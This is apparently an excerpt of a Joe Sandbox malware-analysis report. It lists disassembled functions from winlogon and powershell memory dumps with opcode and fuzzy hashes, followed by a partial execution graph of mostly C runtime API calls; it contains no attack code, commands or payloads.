                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                  • String ID: U
                                                                                                                                  • API String ID: 442123175-4171548499
                                                                                                                                  • Opcode ID: c300b062bf40c1b0f0350794fff0bce10eccca881518eaa2bc6995b38d179998
                                                                                                                                  • Instruction ID: ce73aa44601743cf3e015d5f91180fe2e015fd1fbfde48ec3b6ef6d682136fa4
                                                                                                                                  • Opcode Fuzzy Hash: c300b062bf40c1b0f0350794fff0bce10eccca881518eaa2bc6995b38d179998
                                                                                                                                  • Instruction Fuzzy Hash: 3A41E832715AC186D760CF26E408799B7A4F3487C4F92412AEE4DC7759DB38C481CB61
                                                                                                                                  Function 000002E991758F38 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFileHeaderRaise
                                                                                                                                  • String ID: csm
                                                                                                                                  • API String ID: 2573137834-1018135373
                                                                                                                                  • Opcode ID: 05c643ba0fff1e06ef6870c314c11f152e6731387db1d0900097cc2ceff7ecf8
                                                                                                                                  • Instruction ID: 3606808497edbf20d662895f74c6610c9cf0464f2ebfca14efeab02b7b6952ed
                                                                                                                                  • Opcode Fuzzy Hash: 05c643ba0fff1e06ef6870c314c11f152e6731387db1d0900097cc2ceff7ecf8
                                                                                                                                  • Instruction Fuzzy Hash: 24110D32214B8182EB618F16F448259B7E5F788B98F594229EF8D47BA5DF3CC591CB00
                                                                                                                                  Function 000002E991751D2C Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$AllocFree
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 756756679-0
                                                                                                                                  • Opcode ID: 44cd146342faa2683118c2083562395920ada9481bf43a04c3a7edce6a0c89e5
                                                                                                                                  • Instruction ID: 21ca405e7cc76d6ae43869d68934ef90ffdfe88700d0c6fc1221b6959923ff06
                                                                                                                                  • Opcode Fuzzy Hash: 44cd146342faa2683118c2083562395920ada9481bf43a04c3a7edce6a0c89e5
                                                                                                                                  • Instruction Fuzzy Hash: E5118021A51BC1C2EA04DF6BE40C25967A0F789FD1F5A412ADE4E93726DF38D8C28B40
                                                                                                                                  Function 000002E991751264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AllocProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1617791916-0
                                                                                                                                  • Opcode ID: 11fcece52ee99c166653a5fed92b98cdda4cc5c9cd39da26b35572983ca8ad03
                                                                                                                                  • Instruction ID: 4365831ac4a1d78b19b4e20ed09ca75881cc88aced96f4e1924374582afe64e7
                                                                                                                                  • Opcode Fuzzy Hash: 11fcece52ee99c166653a5fed92b98cdda4cc5c9cd39da26b35572983ca8ad03
                                                                                                                                  • Instruction Fuzzy Hash: D8E065B1A51A81C7E7088FA7D80C34937E1FB88F89F4AC028C90947361DF7D84D99BA1
                                                                                                                                  Function 000002E991751000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AllocProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1617791916-0
                                                                                                                                  • Opcode ID: 6d4e741a80645aa38d679c7d836c804d7a921615e82b3422f13091cf6fe4e87e
                                                                                                                                  • Instruction ID: 4c5f173145cd02c75f98d18036ef2758b66d33a85de4f355505242d683ffbd8f
                                                                                                                                  • Opcode Fuzzy Hash: 6d4e741a80645aa38d679c7d836c804d7a921615e82b3422f13091cf6fe4e87e
                                                                                                                                  • Instruction Fuzzy Hash: 97E0EDB1661581C7E7089B67D80C25977A1FB88B99F458029C90947311DE3884D99A21

                                                                                                                                  Executed Functions

                                                                                                                                  Function 00007FFB4AED6605 Relevance: 1.7, Strings: 1, Instructions: 451COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000008.00000002.1667876134.00007FFB4AED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AED0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffb4aed0000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: X7)t
                                                                                                                                  • API String ID: 0-502735242
                                                                                                                                  • Opcode ID: b87ede6c9fc77477d2d56952c9e058ef0e961b1362249b2fc1da17cd1ede3e3c
                                                                                                                                  • Instruction ID: 14ba7426f3a1734105a9f6a8dc2aabf0435e3bbe77384b19cbc8af6f4068c5c8
                                                                                                                                  • Opcode Fuzzy Hash: b87ede6c9fc77477d2d56952c9e058ef0e961b1362249b2fc1da17cd1ede3e3c
                                                                                                                                  • Instruction Fuzzy Hash: 8BD123A295EA8A8FE7A6BF78C8155B97BD5FF16310B2800FED45CCB093DA189805C351
                                                                                                                                  Function 00007FFB4AE0B3F8 Relevance: .4, Instructions: 365COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000008.00000002.1666729479.00007FFB4AE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE00000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffb4ae00000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 301400cc170fefaaa3adda1eeb3efe0ba751c092febd3eaf905aa171128f7901
                                                                                                                                  • Instruction ID: 8caf2ed7db68c86e064164f2f7b73994a75fe143a63fc14d1ada5819ab5a69fc
                                                                                                                                  • Opcode Fuzzy Hash: 301400cc170fefaaa3adda1eeb3efe0ba751c092febd3eaf905aa171128f7901
                                                                                                                                  • Instruction Fuzzy Hash: 8CB1287091CB488FE759FF68C4856B97BE1FFA5310F2001BED09AC3196DA25E846CB41
                                                                                                                                  Function 00007FFB4AED4073 Relevance: .2, Instructions: 183COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000008.00000002.1667876134.00007FFB4AED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AED0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffb4aed0000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: dbd1718b194d49d9a76a04b2c7614fb40519f57fbc3547e09c9a8762e0b3a616
                                                                                                                                  • Instruction ID: f829622ecccc08f3b2cd3aac8649ea854911752e866ef624b7e1c5c92dfa0c28
                                                                                                                                  • Opcode Fuzzy Hash: dbd1718b194d49d9a76a04b2c7614fb40519f57fbc3547e09c9a8762e0b3a616
                                                                                                                                  • Instruction Fuzzy Hash: 5E51D062A8DA4B4FE79ABE2CD55167477D6EFA4220B3801FED06DC7192DE14EC058382
                                                                                                                                  Function 00007FFB4AED4370 Relevance: .1, Instructions: 147COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000008.00000002.1667876134.00007FFB4AED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AED0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffb4aed0000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f3b083dbf3acef3143991f594789e4c77d516ad2ec4b05a4a2e1fe1064226161
                                                                                                                                  • Instruction ID: 97ac41a73046337d6e3626d07ab288f35ef23be334619bad71c4e9fdd63d1fd9
                                                                                                                                  • Opcode Fuzzy Hash: f3b083dbf3acef3143991f594789e4c77d516ad2ec4b05a4a2e1fe1064226161
                                                                                                                                  • Instruction Fuzzy Hash: AB411462A5DA4A4FE7A9FF3CD4016B87BD5FF94220B2801FAD46EC3183E914EC058391
                                                                                                                                  Function 00007FFB4ACEED40 Relevance: .1, Instructions: 126COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000008.00000002.1665263294.00007FFB4ACED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ACED000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffb4aced000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: bbbe97c276951c63913cb58bc6b3eaa37ff25706b515d3e11e0ba19dbf4204c4
                                                                                                                                  • Instruction ID: 7750e748a4bfd865e53282711234fa8d5dd95efd157c06d708832af47a6b97c2
                                                                                                                                  • Opcode Fuzzy Hash: bbbe97c276951c63913cb58bc6b3eaa37ff25706b515d3e11e0ba19dbf4204c4
                                                                                                                                  • Instruction Fuzzy Hash: 5441E37040DBC4AFE796DF38DC419523FF4EB56260B1905DFD088CB5A3D629A845C7A2
                                                                                                                                  Function 00007FFB4AE0A1E0 Relevance: .1, Instructions: 113COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000008.00000002.1666729479.00007FFB4AE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE00000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffb4ae00000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a266c7554efd32c81c2e3ecb86d48620369d255648fe6988d9d733f1d50a6df9
                                                                                                                                  • Instruction ID: 09ced96843f8533cb93d1af9e495e234084715604650ad4885d1c8adc39217b5
                                                                                                                                  • Opcode Fuzzy Hash: a266c7554efd32c81c2e3ecb86d48620369d255648fe6988d9d733f1d50a6df9
                                                                                                                                  • Instruction Fuzzy Hash: 60312AE280EAEA1ED3127F6CDC9A4D47FE4FF21214B5841F7D0D897093EE1514098792
                                                                                                                                  Function 00007FFB4AE09789 Relevance: .1, Instructions: 110COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000008.00000002.1666729479.00007FFB4AE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE00000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffb4ae00000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c73f0832272db35d5e05a7b139cc2d7b6bcd879fd11eae8e507d29af001b1b24
                                                                                                                                  • Instruction ID: 7d20388130684c4b9643e0b8d722de93811a25b50c4647ff9ecc9ee55c9d7081
                                                                                                                                  • Opcode Fuzzy Hash: c73f0832272db35d5e05a7b139cc2d7b6bcd879fd11eae8e507d29af001b1b24
                                                                                                                                  • Instruction Fuzzy Hash: C431617091CB4C9FDB58EF5CE84A6A97BE0FB99311F00822FE449D3251CB71A8558BC6
                                                                                                                                  Function 00007FFB4AED40BF Relevance: .1, Instructions: 96COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000008.00000002.1667876134.00007FFB4AED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AED0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffb4aed0000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: aa8c24ecd5b20dc44e0003407f15c1ab9e214ad69ee08b54b7ea1265c3a853ad
                                                                                                                                  • Instruction ID: 193119004cf425a3b974f527102e4af92be1c59b72b537fb39b9a28e3105df68
                                                                                                                                  • Opcode Fuzzy Hash: aa8c24ecd5b20dc44e0003407f15c1ab9e214ad69ee08b54b7ea1265c3a853ad
                                                                                                                                  • Instruction Fuzzy Hash: F321BFA2A8DA874FE7A9FE28C65117466D5FF74210B7900FDD06DC71A2CE18EC058382
                                                                                                                                  Function 00007FFB4AED43BC Relevance: .1, Instructions: 63COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000008.00000002.1667876134.00007FFB4AED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AED0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffb4aed0000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6535aaa4f74fc5232fc6c08d34c4d0821953d6bdd1a7f06bbf5b0907f7e33781
                                                                                                                                  • Instruction ID: 455cf4cf740d66cd01d55940c0e505d7f80d47ff433fc8362b2531032903e84c
                                                                                                                                  • Opcode Fuzzy Hash: 6535aaa4f74fc5232fc6c08d34c4d0821953d6bdd1a7f06bbf5b0907f7e33781
                                                                                                                                  • Instruction Fuzzy Hash: F81106B299EA464FE7A5FF3CD4505787AD5FF6432077500F5D06DC3192D918AC448381
                                                                                                                                  Function 00007FFB4AE033B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000008.00000002.1666729479.00007FFB4AE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE00000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffb4ae00000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                  • Instruction ID: 21724ec65f5ac91a1d15301578252d5d379abdd94b6196d2d6dfe5e5341e5c4b
                                                                                                                                  • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                  • Instruction Fuzzy Hash: 3801A77011CB0C8FD744EF0CE051AA5B7E0FB95320F10056DE58AC3651DA36E882CB41

                                                                                                                                  Non-executed Functions

                                                                                                                                  Function 00007FFB4AE08995 Relevance: 5.1, Strings: 4, Instructions: 149COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000008.00000002.1666729479.00007FFB4AE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE00000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffb4ae00000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: L_^$L_^$L_^$L_^
                                                                                                                                  • API String ID: 0-2357752022
                                                                                                                                  • Opcode ID: 5ec8a86f253a5862510a6a8e0ede2f5a6f20fa2d75c22f464fe1719051ba19ea
                                                                                                                                  • Instruction ID: 196c3c22b0b355b4609763ed8da48462fbf23e5e6da1f05bedd5077ca7066d35
                                                                                                                                  • Opcode Fuzzy Hash: 5ec8a86f253a5862510a6a8e0ede2f5a6f20fa2d75c22f464fe1719051ba19ea
                                                                                                                                  • Instruction Fuzzy Hash: AE41D5E394E6E21FE3467E698D650D57FA4FF52364B2D51F7C0989B083EE18240B8292
                                                                                                                                  Function 00007FFB4AE08BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000008.00000002.1666729479.00007FFB4AE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE00000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffb4ae00000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: L_^4$L_^7$L_^F$L_^J
                                                                                                                                  • API String ID: 0-3225005683
                                                                                                                                  • Opcode ID: 8102688ab214c8cdd39813c713289ae0ebbb44b5a4c555a5b4d77903fd85f6ad
                                                                                                                                  • Instruction ID: bd13c1e36a2624b77968cd580650ed13cf006c16d22f5ddf69250e17c29cb4c5
                                                                                                                                  • Opcode Fuzzy Hash: 8102688ab214c8cdd39813c713289ae0ebbb44b5a4c555a5b4d77903fd85f6ad
                                                                                                                                  • Instruction Fuzzy Hash: 102123B76082258ED3027BBDF8045ED3B68CF9423434552F3DA998B003EA1870DB8AF0

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:1.3%
                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                  Signature Coverage:0%
                                                                                                                                  Total number of Nodes:1393
                                                                                                                                  Total number of Limit Nodes:10
                                                                                                                                  execution_graph 7625 213bdcf4582 7634 213bdce9738 7625->7634 7627 213bdcf45d4 __CxxCallCatchBlock 7645 213bdce90e4 7627->7645 7630 213bdcf45e8 7631 213bdce90e4 __CxxCallCatchBlock 9 API calls 7630->7631 7632 213bdcf45f8 7631->7632 7635 213bdce90e4 __CxxCallCatchBlock 9 API calls 7634->7635 7636 213bdce974a 7635->7636 7637 213bdce90e4 __CxxCallCatchBlock 9 API calls 7636->7637 7638 213bdce9785 7636->7638 7639 213bdce9755 7637->7639 7639->7638 7640 213bdce90e4 __CxxCallCatchBlock 9 API calls 7639->7640 7641 213bdce9776 7640->7641 7641->7627 7642 213bdce8db8 7641->7642 7643 213bdce90e4 __CxxCallCatchBlock 9 API calls 7642->7643 7644 213bdce8dc6 7643->7644 7644->7627 7648 213bdce9100 7645->7648 7647 213bdce90ed 7647->7630 7649 213bdce911f GetLastError 7648->7649 7650 213bdce9118 7648->7650 7660 213bdce9a4c 7649->7660 7650->7647 7664 213bdce986c 7660->7664 7665 213bdce9956 TlsGetValue 7664->7665 7671 213bdce98b0 __vcrt_InitializeCriticalSectionEx 7664->7671 7666 213bdce98de LoadLibraryExW 7668 213bdce98ff GetLastError 7666->7668 7669 213bdce997d 7666->7669 7667 213bdce999d GetProcAddress 7667->7665 7668->7671 7669->7667 7670 213bdce9994 FreeLibrary 7669->7670 7670->7667 7671->7665 7671->7666 7671->7667 7672 213bdce9921 LoadLibraryExW 7671->7672 7672->7669 7672->7671 8859 213bdceac02 8860 213bdce90e4 __CxxCallCatchBlock 9 API calls 8859->8860 8861 213bdceac0f __CxxCallCatchBlock 8860->8861 8862 213bdceac53 RaiseException 8861->8862 8863 213bdceac7a 8862->8863 8864 213bdce9738 __CxxCallCatchBlock 9 API calls 8863->8864 8869 213bdceac82 8864->8869 8865 213bdceacab __CxxCallCatchBlock 8866 213bdce90e4 __CxxCallCatchBlock 9 API calls 8865->8866 8867 213bdceacbe 8866->8867 8868 213bdce90e4 __CxxCallCatchBlock 9 API calls 8867->8868 8870 213bdceacc7 8868->8870 8869->8865 8871 213bdce8db8 __CxxCallCatchBlock 9 API calls 8869->8871 8871->8865 8351 213bdcefd00 8352 213bdcefd0b 8351->8352 8360 213bdcf29e4 8352->8360 8373 213bdcec318 EnterCriticalSection 8360->8373 8872 213bdcef200 GetProcessHeap 7673 213bdce7f80 7674 213bdce7f89 __scrt_release_startup_lock 7673->7674 7676 213bdce7f8d 7674->7676 7677 213bdceb974 7674->7677 7678 213bdceb994 7677->7678 7705 213bdceb9ad 7677->7705 7679 213bdceb9b2 7678->7679 7680 213bdceb99c 7678->7680 7712 213bdcee624 7679->7712 7706 213bdcecfb4 7680->7706 7692 213bdceba29 7694 213bdcecfb4 __free_lconv_mon 13 API calls 7692->7694 7693 213bdceba3a 7695 213bdceb754 14 API calls 7693->7695 7703 213bdceba2e 7694->7703 7697 213bdceba56 7695->7697 7696 213bdced060 __free_lconv_mon 13 API calls 7696->7705 7698 213bdceba9f 7697->7698 7699 213bdceba86 7697->7699 7697->7703 7701 213bdced060 __free_lconv_mon 13 API calls 7698->7701 7742 213bdced060 7699->7742 7701->7703 7703->7696 7704 213bdced060 __free_lconv_mon 13 API calls 7704->7705 7705->7676 7748 213bdcec8d0 7706->7748 7709 213bdcece0c 7810 213bdceccb8 7709->7810 7713 213bdcee631 7712->7713 7714 213bdceb9b7 7712->7714 7910 213bdcec88c 7713->7910 7718 213bdcedcf8 GetModuleFileNameW 7714->7718 7716 213bdcee660 7915 213bdcee2fc 7716->7915 7719 213bdcedd51 7718->7719 7720 213bdcedd3d GetLastError 7718->7720 7722 213bdcedb38 14 API calls 7719->7722 8106 213bdcecf44 7720->8106 7723 213bdcedd7f 7722->7723 7729 213bdcedd90 7723->7729 8111 213bdceef58 7723->8111 7725 213bdce7e30 _invalid_parameter_noinfo 8 API calls 7727 213bdceb9ce 7725->7727 7730 213bdceb754 7727->7730 7728 213bdcedd4a 7728->7725 8115 213bdcedbdc 7729->8115 7732 213bdceb792 7730->7732 7734 213bdceb7f8 7732->7734 8132 213bdcee9dc 7732->8132 7733 213bdceb8e5 7736 213bdceb914 7733->7736 7734->7733 7735 213bdcee9dc 14 API calls 7734->7735 7735->7734 7737 213bdceb964 7736->7737 7738 213bdceb92c 7736->7738 7737->7692 7737->7693 7738->7737 7739 213bdcecfe0 _invalid_parameter_noinfo 13 API calls 7738->7739 7740 213bdceb95a 7739->7740 7741 213bdced060 __free_lconv_mon 13 API calls 7740->7741 7741->7737 7743 213bdced065 HeapFree 7742->7743 7745 213bdceba8f 7742->7745 7744 213bdced080 GetLastError 7743->7744 7743->7745 7746 213bdced08d __free_lconv_mon 7744->7746 7745->7704 7747 213bdcecfb4 __free_lconv_mon 11 API calls 7746->7747 7747->7745 7749 213bdcec919 GetLastError 7748->7749 7754 213bdcec8ef __free_lconv_mon 7748->7754 7750 213bdcec92c 7749->7750 7751 213bdcec94a SetLastError 7750->7751 7753 213bdcec947 7750->7753 7756 213bdcec700 _invalid_parameter_noinfo 11 API calls 7750->7756 7752 213bdceb9a1 7751->7752 7752->7709 7753->7751 7754->7752 7757 213bdcec700 GetLastError 7754->7757 7756->7753 7758 213bdcec726 7757->7758 7759 213bdcec72c SetLastError 7758->7759 7775 213bdcecfe0 7758->7775 7760 213bdcec7a5 7759->7760 7760->7752 7763 213bdcec765 FlsSetValue 7765 213bdcec771 FlsSetValue 7763->7765 7766 213bdcec788 7763->7766 7764 213bdcec755 FlsSetValue 7767 213bdced060 __free_lconv_mon 7 API calls 7764->7767 7768 213bdced060 __free_lconv_mon 7 API calls 7765->7768 7782 213bdcec518 7766->7782 7770 213bdcec763 7767->7770 7771 213bdcec786 SetLastError 7768->7771 7770->7759 7771->7760 7778 213bdcecff1 _invalid_parameter_noinfo 7775->7778 7776 213bdced042 7780 213bdcecfb4 __free_lconv_mon 12 API calls 7776->7780 7777 213bdced026 HeapAlloc 7777->7778 7779 213bdcec747 7777->7779 7778->7776 7778->7777 7787 213bdceb230 7778->7787 7779->7763 7779->7764 7780->7779 7796 213bdcec3f0 7782->7796 7790 213bdceb280 7787->7790 7795 213bdcec318 EnterCriticalSection 7790->7795 7808 213bdcec318 EnterCriticalSection 7796->7808 7811 213bdcecce3 7810->7811 7818 213bdcecd54 7811->7818 7813 213bdcecd0a 7814 213bdcecd2d 7813->7814 7828 213bdcec1a0 7813->7828 7816 213bdcecd42 7814->7816 7817 213bdcec1a0 _invalid_parameter_noinfo 17 API calls 7814->7817 7816->7705 7817->7816 7841 213bdceca88 7818->7841 7822 213bdcecd8f 7822->7813 7829 213bdcec1af GetLastError 7828->7829 7830 213bdcec1f8 7828->7830 7831 213bdcec1c4 7829->7831 7830->7814 7832 213bdcec960 _invalid_parameter_noinfo 14 API calls 7831->7832 7833 213bdcec1de SetLastError 7832->7833 7833->7830 7834 213bdcec201 7833->7834 7835 213bdcec1a0 _invalid_parameter_noinfo 15 API calls 7834->7835 7836 213bdcec227 7835->7836 7881 213bdcefda8 7836->7881 7842 213bdcecadf 7841->7842 7843 213bdcecaa4 GetLastError 7841->7843 7842->7822 7847 213bdcecaf4 7842->7847 7844 213bdcecab4 7843->7844 7854 213bdcec960 7844->7854 7848 213bdcecb10 GetLastError SetLastError 7847->7848 7849 213bdcecb28 7847->7849 7848->7849 7849->7822 7850 213bdcece2c IsProcessorFeaturePresent 7849->7850 7851 213bdcece3f 7850->7851 7859 213bdcecb40 7851->7859 7855 213bdcec988 FlsGetValue 7854->7855 7857 213bdcec984 7854->7857 7855->7857 7856 213bdcec99e SetLastError 7856->7842 7857->7856 7858 213bdcec700 _invalid_parameter_noinfo 13 API calls 7857->7858 7858->7856 7860 213bdcecb7a _invalid_parameter_noinfo 7859->7860 7861 213bdcecba2 RtlCaptureContext RtlLookupFunctionEntry 7860->7861 7862 213bdcecbee 